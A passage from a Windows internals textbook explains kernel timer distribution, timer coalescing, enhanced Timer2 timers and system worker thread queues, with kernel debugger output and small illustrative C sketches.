By spreading the timers across processors, as shown in Figure 8-21, the timer expira-
tion load is fully distributed among unparked logical processors. The timer object stores its associated
processor number in the dispatcher header on 32-bit systems and in the object itself on 64-bit systems.
[Figure 8-21 contrasts two queuing behaviors across CPUs 0 through 3: all timers queued on CPU 0 versus timers queued on the current CPU.]
FIGURE 8-21 Timer queuing behaviors.
Distributing timers this way has a cost, however, because the processors cannot sleep as
much. Additionally, it makes each timer expiration event (such as a clock tick) more complex, because a
processor may have gone idle but still have had timers associated with it, meaning that the processor(s)
must still receive periodic clock interrupts. This also creates
asynchronous behaviors in timer expiration, which may not always be desired. This complexity makes
it hard to guarantee that only a single processor
can ultimately remain to manage the clock. Therefore, on client systems, timer serialization is enabled if
Modern Standby is available, which causes the kernel to choose CPU 0 no matter what. This allows CPU
0 to behave as the default clock owner—the processor that will always be active to pick up clock inter-
rupts (more on this later).
74
CHAPTER 8 System mechanisms
Note This behavior is controlled by the kernel variable KiSerializeTimerExpiration, which is
initialized based on a registry setting whose value is different between a server and client
installation. By modifying or creating the value SerializeTimerExpiration under
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel and setting it to any value
other than 0 or 1, serialization can be disabled, enabling timers to be distributed among
processors. Deleting the value, or keeping it as 0, allows the kernel to make the decision
based on Modern Standby availability, and setting it to 1 permanently enables serialization
even on non-Modern Standby systems.
EXPERIMENT: Listing system timers
You can use the kernel debugger to dump all the current registered timers on the system, as well as
information on the DPC associated with each timer (if any). See the following output for a sample:
0: kd> !timer
Dump system timers
Interrupt time: 250fdc0f 00000000 [12/21/2020 03:30:27.739]
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 0 - High precision)
List Timer Interrupt Low/High Fire Time
DPC/thread
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 1 - Standard)
List Timer Interrupt Low/High Fire Time
DPC/thread
1 ffffdb08d6b2f0b0 0807e1fb 80000000 [          NEVER         ] thread ffffdb08d748f480
4 ffffdb08d7837a20 6810de65 00000008 [12/21/2020 04:29:36.127]
6 ffffdb08d2cfc6b0 4c18f0d1 00000000 [12/21/2020 03:31:33.230] netbt!TimerExpiry
(DPC @ ffffdb08d2cfc670)
fffff8011fd3d8a8 A fc19cdd1 00589a19 [ 1/ 1/2100 00:00:00.054] nt!ExpCenturyDpcRoutine
(DPC @ fffff8011fd3d868)
7 ffffdb08d8640440 3b22a3a3 00000000 [12/21/2020 03:31:04.772] thread ffffdb08d85f2080
ffffdb08d0fef300 7723f6b5 00000001 [12/21/2020 03:39:54.941]
FLTMGR!FltpIrpCtrlStackProfilerTimer (DPC @ ffffdb08d0fef340)
11 fffff8011fcffe70 6c2d7643 00000000 [12/21/2020 03:32:27.052] nt!KdpTimeSlipDpcRoutine
(DPC @ fffff8011fcffe30)
ffffdb08d75f0180 c42fec8e 00000000 [12/21/2020 03:34:54.707] thread ffffdb08d75f0080
14 fffff80123475420 283baec0 00000000 [12/21/2020 03:30:33.060] tcpip!IppTimeout
(DPC @ fffff80123475460)
. . .
58 ffffdb08d863e280 P 3fec06d0 00000000 [12/21/2020 03:31:12.803] thread ffffdb08d8730080
fffff8011fd3d948 A 90eb4dd1 00000887 [ 1/ 1/2021 00:00:00.054] nt!ExpNextYearDpcRoutine
(DPC @ fffff8011fd3d908)
. . .
104 ffffdb08d27e6d78 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6d38)
ffffdb08d27e6f10 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6ed0)
106 ffffdb08d29db048 P 251210d3 00000000 [12/21/2020 03:30:27.754]
CLASSPNP!ClasspCleanupPacketTimerDpc (DPC @ ffffdb08d29db088)
fffff80122e9d110 258f6e00 00000000 [12/21/2020 03:30:28.575]
Ntfs!NtfsVolumeCheckpointDpc (DPC @ fffff80122e9d0d0)
108 fffff8011c6e6560 19b1caef 00000002 [12/21/2020 03:44:27.661]
tm!TmpCheckForProgressDpcRoutine (DPC @ fffff8011c6e65a0)
111 ffffdb08d27d5540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27d5580)
ffffdb08d27da540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27da580)
. . .
Total Timers: 221, Maximum List: 8
Current Hand: 139
In this example, which has been shortened for space reasons, there are multiple driver-
associated timers, due to expire shortly, associated with the Netbt.sys and Tcpip.sys drivers (both
related to networking), as well as Ntfs and the storage (storport) drivers. There are also back-
ground housekeeping timers due to expire, such as those related to power management and ETW.
Additionally, there are a dozen or so timers that do not have any DPC associated with them,
which likely indicates user-mode or
kernel-mode timers that are used for wait dispatching. You can use !thread on the thread point-
ers to verify this.
Finally, three interesting timers that are always present on a Windows system are the timer
that checks for Daylight Savings Time time-zone changes, the timer that checks for the arrival
of the upcoming year, and the timer that checks for entry into the next century. One can easily
locate them based on their typically distant expiration time, unless this experiment is performed
on the eve of one of these events.
Intelligent timer tick distribution
As Figure 8-20 showed, processor 1
wakes up several times (the solid arrows) even when there are no associated expiring timers (the dotted
arrows). Although that behavior is required as long as processor 1 is running (to update the thread/pro-
cess run times and scheduling state), what if processor 1 is idle (and has no expiring timers)? Does it still
need to handle the clock interrupt? Because the only other work required that was referenced earlier is to
update the overall system time/clock ticks, it is sufficient to designate merely one time-
keeping processor (in this case, processor 0) and allow other processors to remain in their sleep state; if
they wake, any time-related adjustments can be performed by resynchronizing with processor 0.
Windows does, in fact, make this realization (internally called intelligent timer tick distribution),
and Figure 8-22 shows the same workload after it is applied: an idle processor wakes up only
to handle its expiring timers, creating a much larger gap (sleeping period). The kernel uses a variable
KiPendingTimerBitmaps, which contains an array of affinity masks indicating which logical
processors need to receive a clock interval for the given timer hand (clock-tick interval). It can then
appropriately program the interrupt controller, as well as determine to which processors it will send an
IPI to initiate timer processing.
FIGURE 8-22 Intelligent timer tick distribution applied to processor 1.
Leaving as large a gap as possible is important due to the way power management works in
processors: as the processor detects that the workload is going lower and lower, it decreases its power
consumption and enters deeper and deeper idle/sleep states, such as turning off caches. However, if the processor has
to wake again, it will consume energy and take time to power up; for this reason, processor designers will
risk entering these lower idle/sleep states (C-states) only if the time spent in a given state outweighs the
time and energy it takes to enter and exit the state. Obviously, it makes no sense to spend 10 ms to enter a
sleep state that will last only 1 ms. By preventing clock interrupts from waking sleeping processors unless
needed (due to timers), they can enter deeper C-states and stay there longer.
Timer coalescing
Although minimizing clock interrupts to sleeping processors during periods of no timer expiration
gives a big boost to longer C-state intervals, with a timer granularity of 15 ms, many timers likely will
be queued at any given hand and expire often, even if just on processor 0. Reducing the amount
of software timer-expiration work would both help to decrease latency (by requiring less work at
DISPATCH_LEVEL) as well as allow other processors to stay in their sleep states even longer. (Because
processors wake up only to handle expiring timers, fewer timer expirations
result in longer sleep times.) In truth, it is not just the number of expiring timers that really affects sleep
state (it does affect latency), but the periodicity of these timer expirations—six timers all expiring at the
same hand is a better option than six timers expiring at six different hands. Therefore, to fully optimize
idle-time duration, the kernel needs to employ a coalescing mechanism to combine separate timer
hands into an individual hand with multiple expirations.
Timer coalescing works on the assumption that most drivers and user-mode applications do not
particularly care about the exact firing period of their timers (except in the case of multimedia ap-
plications, for example). This “don't care” region grows as the original timer period grows: an ap-
plication waking up every 30 seconds probably does not mind waking up every 31 or 29 seconds instead,
while a driver polling every second could probably poll every second plus or minus 50 ms without too
many problems. The important guarantee most periodic timers depend on is that their firing period
remains constant within a certain range, instead of sometimes firing at two seconds
and other times at half a second. Even so, not all timers are ready to be coalesced into coarser granu-
larities, so Windows enables this mechanism only for timers that have marked themselves as coales-
cable, either through the KeSetCoalescableTimer kernel API or through its user-mode counterpart,
SetWaitableTimerEx.
With these APIs, driver and application developers are free to provide the kernel with the maximum
tolerance (or tolerable delay) that their timer will endure, which is defined as the maximum amount of
time past the requested period at which the timer will still function correctly. (In the previous ex-
ample, the 1-second timer had a tolerance of 50 ms.) The recommended minimum tolerance is 32 ms,
which corresponds to about twice the 15.6 ms clock tick; any smaller value would not really result in
any coalescing because the expiring timer could not be moved even from one clock tick to the next.
Regardless of the tolerance that is specified, Windows aligns the timer to one of four preferred coalesc-
ing intervals: 1 second, 250 ms, 100 ms, or 50 ms.
When a tolerable delay is set for a periodic timer, Windows uses a process called shifting, which
causes the timer to drift between periods until it gets aligned to the most optimal multiple of the
period interval within the preferred coalescing interval associated with it. For nonperiodic timers, the tolerance
is scanned, and a preferred expiration time is generated based on the closest acceptable coalescing
interval to the maximum tolerance the caller specified. In this behavior, nonperiodic timers are
always pushed out as far as possible past their real expiration point, which spreads out timers as far as
possible and creates longer sleep times on the processors.
Assume an existing workload of timers on two processors, many of which have tolerances
and are thus coalescable. In one scenario, Windows could decide to coalesce the timers as shown in
Figure 8-23: processor 1 now receives only a handful of clock interrupts, significantly increasing its
periods of idle sleep, and there is less work to
do for some of the clock interrupts on processor 0, possibly removing the latency of requiring a drop
to DISPATCH_LEVEL at each clock interrupt.
FIGURE 8-23 Timer coalescing.
Enhanced timers
Enhanced timers were introduced to satisfy a long list of requirements that previous timer system
improvements had not yet addressed. For one, although timer coalescing reduced power usage, it
also made timers have inconsistent expiration times, even when there was no need to reduce power (in
other words, coalescing was an all-or-nothing proposition). Second, the only mechanism in Windows
for high-resolution timers was for applications and drivers to lower the clock tick globally, which, as
we have seen, has significant negative effects on the system. And, even though the resolution of
these timers was now higher, they were not necessarily more precise, because regular timer expiration
can happen before the clock tick, regardless of how accurate it is. Finally, recall that Connected Standby
added features such as timer virtualization and the Desktop Activity Moderator (DAM), which actively de-
lay the expiration of timers during the resiliency phase of Modern Standby to simulate S3 sleep. However,
some key system timer activity must still be permitted to periodically run even during this phase.
These three requirements led to the creation of enhanced timers, which are also internally known as
Timer2 objects, and the creation of new system calls such as NtCreateTimer2 and NtSetTimer2, as well
as driver APIs such as ExAllocateTimer and ExSetTimer. Enhanced timers support four modes of
behavior, some of which are mutually exclusive:
■ No-wake This type of enhanced timer is an improvement over timer coalescing because it
provides for a tolerable delay that is only used in periods of sleep.
■ High-resolution This type of enhanced timer corresponds to a high-resolution timer with a
precise clock rate that is dedicated to it. The clock rate will only need to run at this speed when
approaching the expiration of the timer.
■ Idle-resilient This type of enhanced timer is still active even during deep sleep, such as the
resiliency phase of modern standby.
■ Finite This is the type for enhanced timers that do not share one of the previously described
properties.
You might wonder: if finite timers do not have any of this
“special” behavior, why create them at all? It turns out that since the new Timer2 infrastructure was a
rewrite of the legacy timer code, it comes with several other benefits:
■ It uses self-balancing red-black binary trees instead of the linked lists that form the timer table.
■ It allows drivers to specify an enable and disable callback without worrying about manually
creating DPCs.
■ It includes new, clean, ETW tracing entries for each operation, aiding in troubleshooting.
■ It provides additional security-in-depth through certain pointer obfuscation techniques and
additional assertions, hardening against data-only exploits and corruption.
CHAPTER 8 System mechanisms
79
Therefore, driver developers that are only targeting Windows 8.1 and later are highly recommended
to use the new enhanced timer infrastructure, even if they do not require the additional capabilities.
Note The documented ExAllocateTimer API does not allow drivers to create idle-resilient
timers. In fact, such an attempt crashes the system. Only Microsoft inbox drivers can
create such timers through the ExAllocateTimerInternal API. Readers are discouraged from
attempting to use this API because the kernel maintains a static, hard-coded list of every
legitimate known caller and
has knowledge of how many such timers the component is allowed to create. Any violations
result in a system crash (blue screen of death).
Enhanced timers also have a more complex set of expiration rules than regular timers because they
end up having two possible due times. The first, the minimum due time, specifies the earliest sys-
tem clock time at which point the timer is allowed to expire. The second, the maximum due time, is the lat-
est system clock time at which the timer should ever expire. Windows guarantees that the timer will ex-
pire somewhere between these two points in time, either because of a regular clock tick every interval
(such as 15 ms), or because of an ad-hoc check for timer expiration (such as the one that the idle thread
does upon waking up from an interrupt). This interval is computed by taking the expected expiration
time passed in by the developer and adjusting for the possible “no wake tolerance” that was passed in.
As such, a Timer2 object lives in potentially up to two red-black tree nodes—node 0, for the mini-
mum due time checks, and node 1, for the maximum due time checks. No-wake and high-resolution
timers can require both checks, so how does the system keep track of the
two nodes? Instead of a single red-black tree, the system obviously needs to have more, which are
called collections (KTIMER2_COLLECTION), and each of a timer's nodes is inserted into the appropriate collection,
depending on the rules and combinations shown in Table 8-11.
TABLE 8-11 Timer types and node collection indices

Timer type                         Node 0 collection index          Node 1 collection index
No-wake                            NoWake, if it has a tolerance    NoWake, if it has a non-unlimited or no tolerance
Finite                             Never inserted in this node      Finite
High-resolution                    Hr, always                       Finite, if it has a non-unlimited or no tolerance
Idle-resilient                     NoWake, if it has a tolerance    Ir, if it has a non-unlimited or no tolerance
High-resolution & Idle-resilient   Hr, always                       Ir, if it has a non-unlimited or no tolerance
Think of node 1 as the one that mirrors the default legacy timer behavior—every clock tick, check if
a timer is due to expire. Therefore, a timer with no tolerance
implies that its minimum due time is the same as its maximum due time. If it has unlimited tolerance,
however, the timer effectively has no maximum due time while the system sleeps, meaning it can tolerate
sleeping forever.
High-resolution timers, on the other hand, must expire exactly when they are sup-
posed to expire and never earlier, so node 0 is used for them. However, if their precise expiration time is
“too early” for the check in node 0, they might be in node 1 as well, at which point they are treated like
regular (finite) timers; this can happen if the
caller provided a tolerance, the system is idle, and there is an opportunity to coalesce the timer.
Idle-resilient timers, while the system is not in the resiliency phase, live in the NoWake collec-
tion if they are also no-wake timers, or in the Hr collection other-
wise. However, on the clock tick, which checks node 1, such a timer must be in the special Ir collection to recognize
that the timer needs to execute even though the system is in deep sleep.
Although this may seem complicated at first, this scheme allows all possible tim-
ers to behave correctly when checked either at the system clock tick (node 1—enforcing a maximum
due time) or at the next closest due time computation (node 0—enforcing a minimum due time).
As each timer is inserted into the appropriate collection (KTIMER2_COLLECTION) and associated
red-black tree node(s), the collection's next due time is updated to be the earliest due time of any timer
in the collection, whereas a global variable (KiNextTimer2Due) reflects the earliest due time of any
timer in any collection.
EXPERIMENT: Listing enhanced system timers
The kernel debugger also dumps enhanced (Timer2) timers, which are shown at the bottom of the output:
KTIMER2s:
Address,         Due time,                              Exp. Type  Callback, Attributes,
ffffa4840f6070b0 1825b8f1f4 [11/30/2020 20:50:16.089] (Interrupt) [None] NWF (1826ea1ef4
[11/30/2020 20:50:18.089])
ffffa483ff903e48 1825c45674 [11/30/2020 20:50:16.164] (Interrupt) [None] NW P (27ef6380)
ffffa483fd824960 1825dd19e8 [11/30/2020 20:50:16.326] (Interrupt) [None] NWF (1828d80a68
[11/30/2020 20:50:21.326])
ffffa48410c07eb8 1825e2d9c6 [11/30/2020 20:50:16.364] (Interrupt) [None] NW P (27ef6380)
ffffa483f75bde38 1825e6f8c4 [11/30/2020 20:50:16.391] (Interrupt) [None] NW P (27ef6380)
ffffa48407108e60 1825ec5ae8 [11/30/2020 20:50:16.426] (Interrupt) [None] NWF (1828e74b68
[11/30/2020 20:50:21.426])
ffffa483f7a194a0 1825fe1d10 [11/30/2020 20:50:16.543] (Interrupt) [None] NWF (18272f4a10
[11/30/2020 20:50:18.543])
ffffa483fd29a8f8 18261691e3 [11/30/2020 20:50:16.703] (Interrupt) [None] NW P (11e1a300)
ffffa483ffcc2660 18261707d3 [11/30/2020 20:50:16.706] (Interrupt) [None] NWF (18265bd903
[11/30/2020 20:50:17.157])
ffffa483f7a19e30 182619f439 [11/30/2020 20:50:16.725] (Interrupt) [None] NWF (182914e4b9
[11/30/2020 20:50:21.725])
ffffa483ff9cfe48 182745de01 [11/30/2020 20:50:18.691] (Interrupt) [None] NW P (11e1a300)
ffffa483f3cfe740 18276567a9 [11/30/2020 20:50:18.897] (Interrupt)
Wdf01000!FxTimer::_FxTimerExtCallbackThunk (Context @ ffffa483f3db7360) NWF
(1827fdfe29 [11/30/2020 20:50:19.897]) P (02faf080)
ffffa48404c02938 18276c5890 [11/30/2020 20:50:18.943] (Interrupt) [None] NW P (27ef6380)
ffffa483fde8e300 1827a0f6b5 [11/30/2020 20:50:19.288] (Interrupt) [None] NWF (183091c835
[11/30/2020 20:50:34.288])
ffffa483fde88580 1827d4fcb5 [11/30/2020 20:50:19.628] (Interrupt) [None] NWF (18290629b5
[11/30/2020 20:50:21.628])
In this example, you can mostly see No-wake (NW) enhanced timers, with their minimum due
time shown. Some are periodic (P) and will keep being reinserted at expiration time. A few also
have a finite (F) maximum tolerance, so their maximum due time is shown in parentheses as well.
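The P attribute in this output is a relative period expressed in 100ns units (the unit used by the kernel timer APIs). A small hypothetical helper converts these raw values to milliseconds—for instance, 27ef6380 decodes to 67,000 ms:

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative helper (not a Windows API): convert a relative interval in
 * 100ns units, as shown in the P attribute above, to milliseconds. */
static uint64_t period_100ns_to_ms(uint64_t period)
{
    return period / 10000;  /* 10,000 x 100ns = 1 ms */
}
```

Applying it to the periods above: 0x27ef6380 is a 67-second period, 0x11e1a300 is 30 seconds, and 0x2faf080 is 5 seconds.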
System worker threads
During system initialization, Windows creates several threads in the System process, called system
worker threads, which exist solely to perform work on behalf of other threads. In many cases, threads
executing at DPC/dispatch level need to execute functions that can be performed only at a lower IRQL.
For example, a DPC routine, which executes in an arbitrary thread context (because DPC execution can usurp any thread in the system) at DPC/dispatch level IRQL, might need to access paged pool or wait for a dispatcher object used to synchronize execution with an application thread. Because a DPC routine can't call the wait functions, that processing can't take place at DPC/dispatch level.
Some device drivers and executive components create their own threads dedicated to processing
work at passive level; however, most use system worker threads instead, which avoids the unneces-
sary scheduling and memory overhead associated with having additional threads in the system. An executive component or device driver requests a system worker thread's services by calling ExQueueWorkItem or IoQueueWorkItem. Device drivers should use only the latter (because this associates the work item with a Device object, allowing for greater accountability and the handling of
scenarios in which a driver unloads while its work item is active). These functions place a work item on
a queue dispatcher object where the threads look for work. (Queue dispatcher objects are described in
more detail in the section “I/O completion ports” in Chapter 6 in Part 1.)
The IoQueueWorkItemEx, IoSizeofWorkItem, IoInitializeWorkItem, and IoUninitializeWorkItem APIs behave similarly but create an association with a driver's Driver object or one of its Device objects.
Work items include a pointer to a routine and a parameter that the thread passes to the routine
when it processes the work item. The device driver or executive component that requires passive-level execution can initialize a work item that points to the routine in the driver that waits for the dispatcher object. At some stage, a system worker thread removes the work item from its queue and executes the driver's routine.
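Conceptually, a work item is nothing more than a routine pointer plus a context parameter sitting on a queue. The sketch below models this in portable, user-mode C; the type and function names are ours, and this is not the kernel's implementation behind ExQueueWorkItem/IoQueueWorkItem:

```c
#include <assert.h>
#include <stddef.h>

/* A work item: a routine to run at passive level plus its parameter. */
typedef void (*work_routine_t)(void *parameter);

typedef struct work_item {
    work_routine_t routine;
    void *parameter;
    struct work_item *next;
} work_item_t;

typedef struct {
    work_item_t *head, *tail;
} work_queue_t;

/* Analogous to queuing a work item: append it to the queue's tail. */
static void queue_work_item(work_queue_t *q, work_item_t *item)
{
    item->next = NULL;
    if (q->tail) q->tail->next = item; else q->head = item;
    q->tail = item;
}

/* What a worker thread's loop body does: dequeue one item and run it.
 * Returns 1 if an item was processed, 0 if the queue was empty. */
static int process_one_work_item(work_queue_t *q)
{
    work_item_t *item = q->head;
    if (!item) return 0;
    q->head = item->next;
    if (!q->head) q->tail = NULL;
    item->routine(item->parameter);
    return 1;
}

/* Sample routine and state for demonstration purposes. */
static int work_done;
static void sample_routine(void *parameter) { work_done += *(int *)parameter; }
```

The real kernel version queues onto a queue dispatcher object so that waiting worker threads wake up automatically; the single-threaded loop here only illustrates the item/routine/parameter relationship.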
There are many types of system worker threads:

■ Normal worker threads execute at priority 8 but otherwise behave like delayed worker threads.

■ Background worker threads execute at priority 7 and inherit the same behaviors as normal worker threads.

■ Delayed worker threads execute at priority 12 and process work items that aren't considered time-critical.

■ Critical worker threads execute at priority 13 and are meant to process time-critical work items.

■ Super-critical worker threads execute at priority 14, otherwise mirroring their critical counterparts.

■ Hyper-critical worker threads execute at priority 15 and are otherwise just like other critical threads.

■ Real-time worker threads execute at priority 18, which gives them the distinction of operating in the real-time scheduling range (see Chapter 4 of Part 1 for more information), meaning they are not subject to priority boosting nor regular time slicing.

Because the naming of all of these worker queues started becoming confusing, recent versions of Windows introduced custom priority worker threads, which are now recommended for all driver developers and allow the driver to pass in their own priority level.
A special kernel function, ExpLegacyWorkerInitialization, which is called early in the boot process, sets up the initial number of delayed and critical worker threads, which can be increased through optional registry parameters. You may even have seen these details in an earlier edition of this book.
Note, however, that these variables are there only for compatibility with external instrumentation tools
and are not actually utilized by any part of the kernel on modern Windows 10 systems and later. This is
because recent kernels implemented a new kernel dispatcher object, the priority queue (KPRIQUEUE),
coupled it with a fully dynamic number of kernel worker threads, and further split what used to be a
single queue of worker threads into per-NUMA node worker threads.
On Windows 10 and later, the kernel dynamically creates additional worker threads as needed, with a default maximum limit of 4096 (see the ExpMaximumKernelWorkerThreads variable), which can be configured through the registry up to a maximum of 16,384 threads and down to a minimum of 32. You can set this using the MaximumKernelWorkerThreads registry value.
Each partition object, which we described in Chapter 5 of Part 1, contains an executive partition,
which is the portion of the partition object relevant to the executive—namely, the system worker
thread logic. It contains a data structure tracking the work queue manager for each NUMA node part
of the partition (a queue manager is made up of the deadlock detection timer, the work queue item
reaper, and a handle to the actual thread doing the management). It then contains an array of pointers
to each of the eight possible work queues (EX_WORK_QUEUE). These queues are associated with an
individual index and track the number of minimum (guaranteed) and maximum threads, as well as how
many work items have been processed so far.
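As a rough illustration, a simplified C mirror of the per-queue bookkeeping just described might look as follows. The field names echo the debugger output shown in the experiment later in this section, but the layout is ours and deliberately incomplete—it is not the real EX_WORK_QUEUE:

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative sketch only: a per-queue record tracking thread counts and
 * work-item statistics. MinThreads/TryFailed share one 32-bit field, as
 * the (30:0)/(31:31) bit positions in the debugger dump suggest. */
typedef struct {
    uint32_t work_items_processed;            /* total processed */
    uint32_t work_items_processed_last_pass;  /* snapshot from last check */
    int32_t  thread_count;                    /* current worker threads */
    uint32_t min_threads : 31;                /* guaranteed minimum */
    uint32_t try_failed  : 1;                 /* last queue attempt failed */
    int32_t  max_threads;                     /* dynamic upper limit */
} ex_work_queue_sketch_t;
```

The interval delta between work_items_processed and work_items_processed_last_pass is what the queue manager's periodic checks, described next, operate on.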
Every system includes two default work queues: the ExPool queue and the IoPool queue. The former is used by drivers and system components using the ExQueueWorkItem API, whereas the latter is meant for the IoAllocateWorkItem family of APIs. Additional queues are meant to be used by the internal (non-exported) ExQueueWorkItemToPrivatePool API, which takes in a pool identifier; at present, only the memory manager's Store Manager (see Chapter 5 of Part 1 for more information) leverages this capability.
The executive tries to match the number of critical worker threads with changing work-
loads as the system executes. Whenever work items are being processed or queued, a check is
made to see if a new worker thread might be needed. If so, an event is signaled, waking up the
ExpWorkQueueManagerThread for the associated NUMA node and partition. An additional worker
thread is created in one of the following conditions:
■ There are fewer threads than the minimum number of threads for this queue.

■ The maximum number of threads for this queue hasn't been reached yet, and there are still pending work items in the queue, or the last attempt to try to queue a work item failed.
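The creation policy above can be condensed into a small predicate. This is our own simplified model of the conditions, not kernel code:

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical snapshot of a work queue's state at check time. */
typedef struct {
    int threads;        /* current worker thread count */
    int min_threads;    /* guaranteed minimum */
    int max_threads;    /* dynamic maximum */
    int pending_items;  /* items waiting in the queue */
    bool last_queue_attempt_failed;
} queue_state_t;

/* Spawn another worker if below the guaranteed minimum, or if below the
 * maximum while work is pending or a queue attempt just failed. */
static bool should_create_worker(const queue_state_t *q)
{
    if (q->threads < q->min_threads)
        return true;
    if (q->threads < q->max_threads &&
        (q->pending_items > 0 || q->last_queue_attempt_failed))
        return true;
    return false;
}
```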
Additionally, once every second, for each worker queue manager (that is, for each NUMA node on each partition) the ExpWorkQueueManagerThread can also try to determine whether a deadlock may have occurred—defined as an increase in work items queued during the last interval without a matching increase in the number of work items processed. If this is occurring, an additional worker thread will be created, regardless of any maximum thread limits, hoping to clear out the potential deadlock. This detection will then be disabled until it is deemed necessary to check again (such as if the maximum number of threads has been reached). Since processor topologies can change due to hot add of processors, the manager is also responsible for updating its state to keep track of the new processors as well.
Finally, every two worker-thread-timeout intervals (the timeout is 10 minutes by default, so once every 20 minutes), this thread also checks if it should destroy any system worker threads. Through the same registry parameters, this timeout can be configured with the value WorkerThreadTimeoutInSeconds. This is called reaping and ensures that system worker thread counts do not get out of control. A system worker thread is reaped if it has been waiting for a long time and no pending work items suggest the need for more threads (meaning the current number of threads are clearing them all out in a timely fashion).
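Both periodic checks—deadlock detection and reaping—boil down to simple comparisons over per-interval counters and idle times. The following sketch uses hypothetical names and thresholds to illustrate the logic:

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Deadlock heuristic: items were queued during the interval, but the
 * processed counter did not advance at all. */
static bool possible_deadlock(uint32_t queued_delta, uint32_t processed_delta)
{
    return queued_delta > 0 && processed_delta == 0;
}

/* Reaping heuristic: a worker idle past the timeout, with nothing pending,
 * is surplus and can be destroyed. */
static bool should_reap_worker(uint64_t idle_seconds,
                               uint64_t timeout_seconds,
                               int pending_items)
{
    return idle_seconds >= timeout_seconds && pending_items == 0;
}
```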
EXPERIMENT: Listing system worker threads

Because the kernel moved to the per-partition work queue functionality (which is no longer per-NUMA node as before, and certainly no longer global), the kernel debugger's !exqueue command can no longer be used to see a listing of system worker threads and their queues.

Since the EPARTITION, EX_PARTITION, and EX_WORK_QUEUE data structures are all available
in the public symbols, the debugger data model can be used to explore the queues and their
manager. For example, here is the work queue manager for the main (default) system partition:
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
: 0xffffa483edea99d0 [Type: _EX_WORK_QUEUE_MANAGER *]
[+0x000] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x008] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x010] Event
[Type: _KEVENT]
[+0x028] DeadlockTimer [Type: _KTIMER]
[+0x068] ReaperEvent
[Type: _KEVENT]
[+0x080] ReaperTimer
[Type: _KTIMER2]
[+0x108] ThreadHandle : 0xffffffff80000008 [Type: void *]
[+0x110] ExitThread
: 0x0 [Type: unsigned long]
[+0x114] ThreadSeed
: 0x1 [Type: unsigned short]
Alternatively, here is the ExPool for NUMA Node 0, which currently has 15 threads and has
processed almost 4 million work items so far!
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 3942949 [Type: unsigned long]
[+0x2c4] WorkItemsProcessedLastPass : 3931167 [Type: unsigned long]
[+0x2c8] ThreadCount
: 15 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: ExPoolUntrusted (0) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
You could then look into the ThreadListHead of the WorkPriQueue to enumerate the worker
threads associated with this queue:
lkd> dx -r0 @$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->
ExPartition)->WorkQueues[0][0]
@$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0]
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
lkd> dx Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
[0x0]
[Type: _KTHREAD]
[0x1]
[Type: _KTHREAD]
[0x2]
[Type: _KTHREAD]
[0x3]
[Type: _KTHREAD]
[0x4]
[Type: _KTHREAD]
[0x5]
[Type: _KTHREAD]
[0x6]
[Type: _KTHREAD]
[0x7]
[Type: _KTHREAD]
[0x8]
[Type: _KTHREAD]
[0x9]
[Type: _KTHREAD]
[0xa]
[Type: _KTHREAD]
[0xb]
[Type: _KTHREAD]
[0xc]
[Type: _KTHREAD]
[0xd]
[Type: _KTHREAD]
[0xe]
[Type: _KTHREAD]
[0xf]
[Type: _KTHREAD]
That was only the ExPool. Recall that the system also has an IoPool, which would be the next index (1) on this NUMA Node (0). You can also continue the experiment by looking at private pool queues, if any exist on your system:
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
: 0xffffa483ede77c50 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 1844267 [Type: unsigned long]
